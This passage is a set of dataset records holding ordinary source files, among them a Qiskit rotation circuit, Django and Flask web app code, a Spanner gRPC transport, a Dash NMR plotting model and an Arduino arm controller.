cos(slope * x + offset)|0> + sin(slope * x + offset)|1> )\n\n \"\"\"\n\n def __init__(self, slope, offset, num_state_qubits, i_state=None, i_target=None):\n \"\"\"\n Constructor.\n\n Construct linear Y rotation circuit factory\n Args:\n slope (float): slope of the controlled rotation\n offset (float): offset of the controlled rotation\n num_state_qubits (int): number of qubits representing the state\n i_state (array or list): indices of the state qubits (least significant to most significant)\n i_target (int): index of target qubit\n \"\"\"\n\n super().__init__(num_state_qubits + 1)\n\n # store parameters\n self.num_control_qubits = num_state_qubits\n self.slope = slope\n self.offset = offset\n\n self.i_state = None\n if i_state is not None:\n self.i_state = i_state\n else:\n self.i_state = range(num_state_qubits)\n\n self.i_target = None\n if i_target is not None:\n self.i_target = i_target\n else:\n self.i_target = num_state_qubits\n\n def build(self, qc, q, q_ancillas=None):\n\n # get indices\n i_state = self.i_state\n i_target = self.i_target\n\n # apply linear rotation\n if not np.isclose(self.offset / 4 / np.pi % 1, 0):\n qc.ry(self.offset, q[i_target])\n for i, j in enumerate(i_state):\n theta = self.slope * pow(2, i)\n if not np.isclose(theta / 4 / np.pi % 1, 0):\n qc.cry(self.slope * pow(2, i), q[j], q[i_target])\n","sub_path":"qiskit/aqua/circuits/linear_y_rotation.py","file_name":"linear_y_rotation.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101965882","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/9 17:48\n# @Author : StalloneYang\n# @File : urls.py\n# @desc:\n\nfrom django.conf.urls import url\nfrom django.urls import include\n\nfrom . 
import views\n\nurlpatterns = [\n url(r'^register/$',views.register),\n url(r'^register_handle/$',views.register_handle),\n url(r'^login/$',views.login),\n url(r'^login_handle/$',views.login_handle),\n url(r'^uname_exist/$',views.uname_exist),\n url(r'^info/$',views.info),\n url(r'^order(\\d*)/$',views.order),\n url(r'^site/$',views.site),\n url(r'^logout/$',views.logout),\n]\n\n","sub_path":"user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"290062603","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 10 23:49:30 2019\n\n@author: Ahmed\n\nThe class used to control the arm (real one or simulated with Bras.py) using neuroGraph decisions\n\"\"\"\n\nimport tkinter as tk\nimport time\nfrom bras import Bras\nfrom pygame import mixer\nfrom arduino import Arduino\n\ndef funcInc(n):\n return 0.12*n/(15 + n)\n\nclass Controlleur(tk.Frame):\n def __init__(self, master):\n tk.Frame.__init__(self, master)\n self.bras = Bras(self)\n self.bras.grid(row = 2, column = 0, columnspan = 10)\n \n self.decider = None\n \n self.buttonMove = tk.Button(self, text = 'move', command = self.move, repeatinterval = 20, repeatdelay = 200)\n self.buttonMove.grid(row = 3, column = 0)\n \n self.buttonNext = tk.Button(self, text = 'attraper', command = self.attraper, repeatinterval = 20, repeatdelay = 500)\n self.buttonNext.grid(row = 3, column = 1)\n \n self.buttonSens = tk.Button(self, text = 'ouvrir', command = self.ouvrir, repeatinterval = 20, repeatdelay = 500)\n self.buttonSens.grid(row = 3, column = 2)\n \n self.state = None\n self.resetTimer = 2.5\n self.changeTime = time.time()\n \n mixer.init()\n self.sound = mixer.Sound(\"obj/pat.wav\")\n \n self.sens = 1\n self.n = 0\n \n self.bras.info = \"Calcule : attraper\\nMouvement : mouvement\"\n self.bras.nextArt()\n \n def setDecider(self, decider):\n self.decider = decider\n self.decider.grid(row = 0, column = 0, columnspan = 10)\n \n def appendData(self, x, y):\n self.decider.appendData(x, y)\n if self.isBlocked():\n return\n if self.decider.getState() == 1:\n self.attraper()\n time.sleep(1)\n self.ouvrir()\n elif self.decider.getState() == -1:\n self.move()\n else:\n self.n = 0\n \n def move(self):\n self.n += 1\n self.bras.increment = funcInc(self.n)*self.sens\n self.bras.move()\n \n def nextArt(self):\n self.bras.nextArt()\n self.changeTime = time.time()\n \n def swapSens(self):\n self.sens *= -1\n \n def isBlocked(self):\n return time.time() - self.changeTime < self.resetTimer\n \n def attraper(self):\n self.changeTime = time.time()\n self.sound.play()\n self.bras.attraper()\n \n def ouvrir(self):\n self.bras.ouvrir()\n \n# 0 to 180 -> elbow movement\n# 181 = open, 182 = close\nclass ArduinoControl(Controlleur):\n def __init__(self, master, port):\n Controlleur.__init__(self, master)\n self.arduino = Arduino(port)\n \n def move(self):\n Controlleur.move(self)\n # handle the direction\n if self.bras.coude_o < 0:\n self.bras.coude_o = 0\n self.swapSens()\n if self.bras.coude_o > 3.14:\n self.bras.coude_o = 3.14\n self.swapSens()\n self.arduino.sendInt(int(self.bras.coude_o*180/3.1416))\n \n def attraper(self):\n Controlleur.attraper(self)\n self.arduino.sendInt(182)\n \n def ouvrir(self):\n Controlleur.ouvrir(self)\n self.arduino.sendInt(181)\n \n \n \n \n \n \n \n \n \n \n 
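# Usage sketch (hypothetical; assumes a decider widget that provides the\n# appendData/getState/grid interface used above, which is not defined in this file):\n#\n# root = tk.Tk()\n# ctrl = Controlleur(root)  # or ArduinoControl(root, 'COM3') to drive the real arm\n# ctrl.grid()\n# ctrl.setDecider(my_decider)\n# root.mainloop()\n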
","sub_path":"controlleur.py","file_name":"controlleur.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256075107","text":"import logging\n\nfrom voluptuous import Schema, Required, Optional, MultipleInvalid\n\nfrom mozapkpublisher.common import utils\nfrom mozapkpublisher.common.exceptions import NoTranslationGiven, TranslationMissingData\n\nlogger = logging.getLogger(__name__)\n\n# TODO: receive these options on the CLI, rather than hard-coding this mapping here in mozapkpublisher\nSTORE_PRODUCT_DETAILS_PER_PACKAGE_NAME = {\n 'org.mozilla.fennec_aurora': {\n 'product': 'fx_android',\n # Due to project Dawn, Nightly is now using the Aurora package name.\n # See https://bugzilla.mozilla.org/show_bug.cgi?id=1357351\n 'channel': 'nightly',\n },\n 'org.mozilla.firefox_beta': {\n 'product': 'fx_android',\n 'channel': 'beta',\n },\n 'org.mozilla.firefox': {\n 'product': 'fx_android',\n 'channel': 'release',\n },\n 'org.mozilla.focus': {\n 'product': 'focus_android',\n 'channel': 'release',\n },\n 'org.mozilla.klar': {\n 'product': 'klar_android',\n 'channel': 'release',\n }\n}\n\n# API documentation: https://l10n.mozilla-community.org/stores_l10n/documentation/\nL10N_API_URL = 'https://l10n.mozilla-community.org/stores_l10n/api/v1'\n_ALL_LOCALES_URL = L10N_API_URL + '/{product}/listing/{channel}/'\n_LOCALE_URL = L10N_API_URL + '/{product}/translation/{channel}/{locale}/'\n_MAPPING_URL = L10N_API_URL + '/google/localesmapping/?reverse'\n\n# Because these scripts are meant to run and exit, we cache the stores_l10n results\n# in these globals\n_translations_per_google_play_locale_code = None\n_mappings = None\n\nTRANSLATION_SCHEMA = Schema({\n Required('long_desc'): str,\n Required('short_desc'): str,\n Required('title'): str,\n Optional('whatsnew'): str,\n})\n\n\ndef get_translations_per_google_play_locale_code(package_name, moz_locales=None):\n product_details = STORE_PRODUCT_DETAILS_PER_PACKAGE_NAME[package_name]\n product = product_details['product']\n channel = product_details['channel']\n\n global _translations_per_google_play_locale_code\n\n _init_full_locales_if_needed(product, channel)\n\n translations = _translations_per_google_play_locale_code if moz_locales is None else {\n _translate_moz_locate_into_google_play_one(moz_locale):\n _translations_per_google_play_locale_code[\n _translate_moz_locate_into_google_play_one(moz_locale)\n ]\n for moz_locale in moz_locales\n }\n\n check_translations_schema(translations)\n return translations\n\n\ndef check_translations_schema(translations):\n if not translations:\n raise NoTranslationGiven(translations)\n\n for locale, translation in translations.items():\n try:\n TRANSLATION_SCHEMA(translation)\n except MultipleInvalid as e:\n raise TranslationMissingData(locale, e)\n\n\ndef _init_full_locales_if_needed(product, channel):\n global _translations_per_google_play_locale_code\n\n if _translations_per_google_play_locale_code is None:\n moz_locales = _get_list_of_completed_locales(product, channel)\n moz_locales.append(u'en-US')\n\n logger.info('Downloading {} locales: {}...'.format(\n len(moz_locales), moz_locales\n ))\n _translations_per_google_play_locale_code = {\n _translate_moz_locate_into_google_play_one(moz_locale):\n _get_translation(product, channel, moz_locale)\n for moz_locale in moz_locales\n }\n logger.info('Locales downloaded and converted to: {}'.format(\n _translations_per_google_play_locale_code.keys()\n ))\n\n\ndef 
_get_list_of_completed_locales(product, channel):\n \"\"\" Get all the locales that are fully translated and supported by Google Play.\n Locales that are unsupported by Google Play, or not yet translated, are excluded,\n so they won't be downloaded.\n \"\"\"\n return utils.load_json_url(_ALL_LOCALES_URL.format(product=product, channel=channel))\n\n\ndef _get_translation(product, channel, locale):\n return utils.load_json_url(_LOCALE_URL.format(product=product, channel=channel, locale=locale))\n\n\ndef _translate_moz_locate_into_google_play_one(locale):\n global _mappings\n if _mappings is None:\n _mappings = utils.load_json_url(_MAPPING_URL)\n\n return _mappings[locale] if locale in _mappings else locale\n","sub_path":"mozapkpublisher/common/store_l10n.py","file_name":"store_l10n.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"326260613","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pkg_resources\nimport grpc_gcp\n\nimport google.api_core.grpc_helpers\n\nfrom google.cloud.spanner_v1.proto import spanner_pb2_grpc\n\n\n_SPANNER_GRPC_CONFIG = 'spanner.grpc.config'\n\n\nclass SpannerGrpcTransport(object):\n \"\"\"gRPC transport class providing stubs for\n google.spanner.v1 Spanner API.\n\n The transport provides access to the raw gRPC stubs,\n which can be used to take advantage of advanced\n features of gRPC.\n \"\"\"\n # The scopes needed to make gRPC calls to all of the methods defined\n # in this service.\n _OAUTH_SCOPES = (\n 'https://www.googleapis.com/auth/cloud-platform',\n 'https://www.googleapis.com/auth/spanner.data',\n )\n\n def __init__(self,\n channel=None,\n credentials=None,\n address='spanner.googleapis.com:443'):\n \"\"\"Instantiate the transport class.\n\n Args:\n channel (grpc.Channel): A ``Channel`` instance through\n which to make calls. This argument is mutually exclusive\n with ``credentials``; providing both will raise an exception.\n credentials (google.auth.credentials.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. 
If none\n are specified, the client will attempt to ascertain the\n credentials from the environment.\n address (str): The address where the service is hosted.\n \"\"\"\n # If both `channel` and `credentials` are specified, raise an\n # exception (channels come with credentials baked in already).\n if channel is not None and credentials is not None:\n raise ValueError(\n 'The `channel` and `credentials` arguments are mutually '\n 'exclusive.', )\n\n # Create the channel.\n if channel is None:\n channel = self.create_channel(\n address=address,\n credentials=credentials,\n )\n\n # gRPC uses objects called \"stubs\" that are bound to the\n # channel and provide a basic method for each RPC.\n self._stubs = {\n 'spanner_stub': spanner_pb2_grpc.SpannerStub(channel),\n }\n\n @classmethod\n def create_channel(cls,\n address='spanner.googleapis.com:443',\n credentials=None):\n \"\"\"Create and return a gRPC channel object.\n\n Args:\n address (str): The host for the channel to use.\n credentials (~.Credentials): The\n authorization credentials to attach to requests. These\n credentials identify this application to the service. If\n none are specified, the client will attempt to ascertain\n the credentials from the environment.\n\n Returns:\n grpc.Channel: A gRPC channel object.\n \"\"\"\n grpc_gcp_config = grpc_gcp.api_config_from_text_pb(\n pkg_resources.resource_string(__name__, _SPANNER_GRPC_CONFIG))\n options = [(grpc_gcp.API_CONFIG_CHANNEL_ARG, grpc_gcp_config)]\n return google.api_core.grpc_helpers.create_channel(\n address,\n credentials=credentials,\n scopes=cls._OAUTH_SCOPES,\n )\n\n @property\n def create_session(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Creates a new session. A session can be used to perform\n transactions that read and/or modify data in a Cloud Spanner database.\n Sessions are meant to be reused for many consecutive\n transactions.\n\n Sessions can only execute one transaction at a time. To execute\n multiple concurrent read-write/write-only transactions, create\n multiple sessions. Note that standalone reads and queries use a\n transaction internally, and count toward the one transaction\n limit.\n\n Cloud Spanner limits the number of sessions that can exist at any given\n time; thus, it is a good idea to delete idle and/or unneeded sessions.\n Aside from explicit deletes, Cloud Spanner can delete sessions for which no\n operations are sent for more than an hour. If a session is deleted,\n requests to it return ``NOT_FOUND``.\n\n Idle sessions can be kept alive by sending a trivial SQL query\n periodically, e.g., ``\\\"SELECT 1\\\"``.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].CreateSession\n\n @property\n def get_session(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Gets a session. 
Returns ``NOT_FOUND`` if the session does not exist.\n This is mainly useful for determining whether a session is still\n alive.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].GetSession\n\n @property\n def list_sessions(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Lists all sessions in a given database.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].ListSessions\n\n @property\n def delete_session(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Ends a session, releasing server resources associated with it.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].DeleteSession\n\n @property\n def execute_sql(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Executes an SQL statement, returning all results in a single reply. This\n method cannot be used to return a result set larger than 10 MiB;\n if the query yields more data than that, the query fails with\n a ``FAILED_PRECONDITION`` error.\n\n Operations inside read-write transactions might return ``ABORTED``. If\n this occurs, the application should restart the transaction from\n the beginning. See ``Transaction`` for more details.\n\n Larger result sets can be fetched in streaming fashion by calling\n ``ExecuteStreamingSql`` instead.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].ExecuteSql\n\n @property\n def execute_streaming_sql(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Like ``ExecuteSql``, except returns the result\n set as a stream. Unlike ``ExecuteSql``, there\n is no limit on the size of the returned result set. However, no\n individual row in the result set can exceed 100 MiB, and no\n column value can exceed 10 MiB.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].ExecuteStreamingSql\n\n @property\n def read(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Reads rows from the database using key lookups and scans, as a\n simple key/value style alternative to\n ``ExecuteSql``. This method cannot be used to\n return a result set larger than 10 MiB; if the read matches more\n data than that, the read fails with a ``FAILED_PRECONDITION``\n error.\n\n Reads inside read-write transactions might return ``ABORTED``. If\n this occurs, the application should restart the transaction from\n the beginning. See ``Transaction`` for more details.\n\n Larger result sets can be yielded in streaming fashion by calling\n ``StreamingRead`` instead.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].Read\n\n @property\n def streaming_read(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Like ``Read``, except returns the result set as a\n stream. Unlike ``Read``, there is no limit on the\n size of the returned result set. 
However, no individual row in\n the result set can exceed 100 MiB, and no column value can exceed\n 10 MiB.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].StreamingRead\n\n @property\n def begin_transaction(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Begins a new transaction. This step can often be skipped:\n ``Read``, ``ExecuteSql`` and\n ``Commit`` can begin a new transaction as a\n side-effect.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].BeginTransaction\n\n @property\n def commit(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Commits a transaction. The request includes the mutations to be\n applied to rows in the database.\n\n ``Commit`` might return an ``ABORTED`` error. This can occur at any time;\n commonly, the cause is conflicts with concurrent\n transactions. However, it can also happen for a variety of other\n reasons. If ``Commit`` returns ``ABORTED``, the caller should re-attempt\n the transaction from the beginning, re-using the same session.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].Commit\n\n @property\n def rollback(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Rolls back a transaction, releasing any locks it holds. It is a good\n idea to call this for any transaction that includes one or more\n ``Read`` or ``ExecuteSql`` requests and\n ultimately decides not to commit.\n\n ``Rollback`` returns ``OK`` if it successfully aborts the transaction, the\n transaction was already aborted, or the transaction is not\n found. ``Rollback`` never returns ``ABORTED``.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].Rollback\n\n @property\n def partition_query(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Creates a set of partition tokens that can be used to execute a query\n operation in parallel. Each of the returned partition tokens can be used\n by ``ExecuteStreamingSql`` to specify a subset\n of the query result to read. The same session and read-only transaction\n must be used by the PartitionQueryRequest used to create the\n partition tokens and the ExecuteSqlRequests that use the partition tokens.\n\n Partition tokens become invalid when the session used to create them\n is deleted, is idle for too long, begins a new transaction, or becomes too\n old. When any of these happen, it is not possible to resume the query, and\n the whole operation must be restarted from the beginning.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].PartitionQuery\n\n @property\n def partition_read(self):\n \"\"\"Return the gRPC stub for {$apiMethod.name}.\n\n Creates a set of partition tokens that can be used to execute a read\n operation in parallel. Each of the returned partition tokens can be used\n by ``StreamingRead`` to specify a subset of the read\n result to read. 
The same session and read-only transaction must be used by\n the PartitionReadRequest used to create the partition tokens and the\n ReadRequests that use the partition tokens. There are no ordering\n guarantees on rows returned among the returned partition tokens, or even\n within each individual StreamingRead call issued with a partition_token.\n\n Partition tokens become invalid when the session used to create them\n is deleted, is idle for too long, begins a new transaction, or becomes too\n old. When any of these happen, it is not possible to resume the read, and\n the whole operation must be restarted from the beginning.\n\n Returns:\n Callable: A callable which accepts the appropriate\n deserialized request object and returns a\n deserialized response object.\n \"\"\"\n return self._stubs['spanner_stub'].PartitionRead\n","sub_path":"spanner/google/cloud/spanner_v1/gapic/transports/spanner_grpc_transport.py","file_name":"spanner_grpc_transport.py","file_ext":"py","file_size_in_byte":14385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"410717403","text":"import re\n\nimport dash_html_components as html\nimport dash_table\nimport pandas as pd\nfrom flask_login import current_user\nfrom plotly import graph_objs as go\nfrom plotly.colors import DEFAULT_PLOTLY_COLORS\n\nfrom dashboards.dashboard_model import DashboardModel\nfrom data_tools.wrappers.collections import get_collection\n\n\nclass VisualizationModel(DashboardModel):\n _redis_prefix = 'viz'\n _empty_plot_data = {}\n\n def get_plot(self, queries, group_by, labels, theme, bin_collection_id, legend_style, background_color):\n print(background_color)\n labels = labels or []\n self.load_dataframes()\n if bin_collection_id is not None:\n print(bin_collection_id)\n bin_collection = get_collection(current_user, bin_collection_id)\n x_mins = bin_collection.get_dataset('x_min').ravel().tolist()\n x_maxes = bin_collection.get_dataset('x_max').ravel().tolist()\n colors = [DEFAULT_PLOTLY_COLORS[i % 2] for i in range(len(x_mins))]\n shapes = [\n go.layout.Shape(\n type='rect',\n xref='x',\n yref='paper',\n x0=x_min,\n y0=0,\n x1=x_max,\n y1=1,\n fillcolor=color,\n opacity=0.2,\n layer='below',\n line_width=0\n )\n for x_min, x_max, color in zip(x_mins, x_maxes, colors)\n ]\n else:\n shapes = []\n\n axis_line_style = {\n 'zerolinecolor': '#375A7F', # darkly primary\n 'gridcolor': '#444444' # darkly secondary\n } if theme == 'plotly_dark' and background_color != 'rgba(255,255,255,1)' else {\n 'zerolinecolor': '#2C3E50', # flatly primary\n 'gridcolor': '#95A5A6' # flatly secondary\n }\n if legend_style in ('full', 'groups'):\n layout = go.Layout(\n height=700,\n font={'size': 16},\n margin={'t': 25, 'l': 25, 'b': 25, 'r': 25},\n template=theme,\n plot_bgcolor=background_color,\n paper_bgcolor=background_color,\n xaxis={\n 'title': 'Chemical Shift (ppm)',\n 'autorange': 'reversed',\n **axis_line_style\n },\n yaxis={\n 'title': 'Intensity',\n **axis_line_style\n },\n shapes=shapes\n )\n else: # if legend_style == 'none'\n layout = go.Layout(\n height=700,\n font={'size': 16},\n margin={'t': 25, 'l': 25, 'b': 25, 'r': 25},\n template=theme,\n plot_bgcolor=background_color,\n paper_bgcolor=background_color,\n xaxis={\n 'title': 'Chemical Shift (ppm)',\n 'autorange': 'reversed',\n **axis_line_style\n },\n yaxis={\n 'title': 'Intensity',\n **axis_line_style\n },\n shapes=shapes,\n showlegend=False\n )\n\n color_indices = [self._label_df.query(query).index for query in queries]\n if 
len(color_indices) > len(DEFAULT_PLOTLY_COLORS): # repeat default color list\n colors = []\n while len(colors) < len(color_indices):\n colors += DEFAULT_PLOTLY_COLORS\n else:\n colors = DEFAULT_PLOTLY_COLORS\n colors = colors[:len(color_indices)]\n x = self._numeric_df.columns.values.astype(float)\n figure = go.Figure(layout=layout)\n\n if legend_style == 'full' or legend_style == 'groups':\n figure.add_trace(\n go.Scatter( # dummy series to use as stand-in for legend title\n x=[0],\n y=[0],\n name=','.join(group_by),\n mode='markers',\n marker={\n 'opacity': 0,\n 'size': 0,\n 'color': 'rgba(0,0,0,0)'\n }\n )\n )\n\n for query, color in zip(queries, colors):\n # split query\n figure.add_trace(\n go.Scatter( # dummy series to label colors\n x=[0],\n y=[0],\n name=','.join(re.findall(r'[\"](\\w+)[\"]', query)), # pretty kludgy\n mode='lines',\n marker={'color': color},\n legendgroup=query\n )\n )\n\n figure.add_trace(\n go.Scatter( # dummy series to provide space between color key and \"heading\"\n x=[0],\n y=[0],\n name='',\n mode='markers',\n marker={\n 'opacity': 0,\n 'size': 0,\n 'color': 'rgba(0,0,0,0)'\n }\n )\n )\n\n if legend_style == 'full':\n figure.add_trace(\n go.Scatter( # dummy series to use as stand-in for legend title\n x=[0],\n y=[0],\n name=f\"({', '.join(labels)})\" if len(labels) else 'Spectrum #',\n mode='markers',\n marker={\n 'opacity': 0,\n 'size': 0,\n 'color': 'rgba(0,0,0,0)'\n }\n )\n )\n\n for query, color in zip(queries, colors):\n y_values = self._numeric_df.loc[self._label_df.query(query).index]\n for i, row in y_values.iterrows():\n text = '
'.join([f'{label}=={self._label_df.loc[i][label]}' for label in self._label_df.columns])\n if len(labels):\n name = f\"({', '.join([f'{self._label_df.loc[i][label]}' for label in labels])})\"\n else:\n name = f'({i})'\n if legend_style == 'groups':\n figure.add_trace(\n go.Scatter(\n x=x,\n y=row,\n text=text,\n name=','.join(re.findall(r'[\"](\\w+)[\"]', query)), # pretty kludgy\n mode='lines',\n marker={'color': color, 'size': 1},\n legendgroup=query,\n showlegend=False\n )\n )\n else:\n figure.add_trace(\n go.Scatter(\n x=x,\n y=row,\n text=text,\n name=name,\n mode='lines',\n marker={'color': color, 'size': 2},\n showlegend=(legend_style == 'full')\n )\n )\n\n return figure\n\n def get_summary(self, queries, labels, x_min, x_max, theme):\n labels = labels or []\n self.load_dataframes()\n in_range_columns = [column for column in self._numeric_df.columns if x_min <= float(column) <= x_max]\n # find sum of points in range\n # average and median sum\n results_dfs = []\n label_column = f'({\", \".join(labels)})'\n for query in queries:\n results_df = pd.DataFrame()\n sub_label_df = self._label_df.query(query)\n sub_numeric_df = self._numeric_df.loc[sub_label_df.index]\n sums = sub_numeric_df[in_range_columns].sum(axis=1)\n results_df[label_column] = sub_label_df.apply(\n lambda row: f'({\",\".join([str(row[label]) for label in labels])})', axis=1)\n results_df['Sum'] = sums\n summary_df = pd.DataFrame()\n summary_df[label_column] = [f'Average({query})', f'Median({query})']\n summary_df['Sum'] = [sums.mean(), sums.median()]\n results_df = summary_df.append(results_df)\n results_dfs.append(results_df)\n style_header = {'backgroundColor': '#303030'} if theme == 'plotly_dark' else {}\n style_cell = {'backgroundColor': '#444444'} if theme == 'plotly_dark' else {}\n\n return [item for pair in [\n (html.H5(query),\n dash_table.DataTable(columns=[{'name': val, 'id': val} for val in df.columns],\n data=df.to_dict('rows'),\n style_header=style_header,\n style_cell=style_cell,\n style_data_conditional=[\n {\n 'if': {'row_index': 0},\n 'fontStyle': 'italic'\n },\n {\n 'if': {'row_index': 1},\n 'fontStyle': 'italic'\n }\n ]),\n html.Br()\n )\n for query, df in zip(queries, results_dfs)\n ] for item in pair]\n","sub_path":"omics/omics_dashboard/dashboards/nmr_metabolomics/visualization/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596977797","text":"\"\"\"Comments table\n\nRevision ID: b3b3d1fcb7df\nRevises: 16cb4dfd7a31\nCreate Date: 2020-04-29 01:40:10.978734\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b3b3d1fcb7df'\ndown_revision = '16cb4dfd7a31'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('comment',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('comment', sa.String(length=64), nullable=True),\n sa.Column('trans_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trans_id'], ['transaction.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('comment')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/b3b3d1fcb7df_comments_table.py","file_name":"b3b3d1fcb7df_comments_table.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424322745","text":"# -*- coding: utf-8 -*-\nimport base64\nimport json\nimport logging\n\nfrom psycopg2 import IntegrityError\n\nfrom odoo import http\nfrom odoo.http import request\n\n_logger = logging.getLogger(__name__)\n\nclass GhuDoctoralStudent(http.Controller):\n @http.route('/campus/student/doctoral-program/', type='http', auth='user', methods=['GET'], website=True)\n def showAllDoctoralPrograms(self, **kwargs):\n # Show all doctorands of student\n partner_id = request.env.user.partner_id.id\n student = request.env['ghu.student'].sudo().search([('partner_id', '=', partner_id)], limit=1)\n programs = request.env['ghu.doctoral_program'].sudo().search(\n [('student_ref', '=', 'ghu.student,'+str(student.id))])\n if programs:\n return http.request.render('ghu.campus_student_doctoral_program_list', {\n 'programs': programs\n })\n return http.request.not_found()\n\n @http.route('/campus/student/doctoral-program/', type='http', auth='user', methods=['GET'], website=True)\n def showProgram(self, obj, **kwargs):\n partner_id = request.env.user.partner_id.id\n student = request.env['ghu.student'].sudo().search([('partner_id', '=', partner_id)], limit=1)\n if obj.student_ref.id == student.id:\n return http.request.render('ghu.campus_student_doctoral_program_overview', {\n 'program': obj\n })\n return http.request.not_found()\n\n \n\n","sub_path":"addons/ghu/controllers/campus/student/doctoral_program/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"254874460","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nfrom flask.ext.login import LoginManager\n\nfrom .models import db, User\nfrom .views import module\n\n__all__ = ('create_app',)\n\n\ndef _init_db(app):\n db.app = app\n db.init_app(app)\n\n\ndef _init_jinja(app):\n pass\n\n\ndef _init_login(app):\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.user_loader(User.get)\n login_manager.login_view = '/signin'\n\n\ndef create_app(name=None):\n if name is None:\n name = __name__\n\n app = Flask(name)\n app.config.from_object('config')\n\n _init_db(app)\n _init_jinja(app)\n _init_login(app)\n\n app.register_blueprint(module)\n return app\n","sub_path":"apps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"576212815","text":"start = 1016\nstop = 7937\npositive = 3\nnegative = (7, 17, 19, 27)\nmax_val = -1\ncount = 0\n\nfor i in range(start, stop + 1):\n result = i % positive == 0\n if result:\n for j in negative:\n result = result and i % j > 0\n else:\n continue\n if result:\n count += 1\n max_val = max(max_val, i)\n\nprint(count, max_val)","sub_path":"17_task/17_27414/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"112018919","text":"from doc.files import read_csv_file, write_csv_file\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom 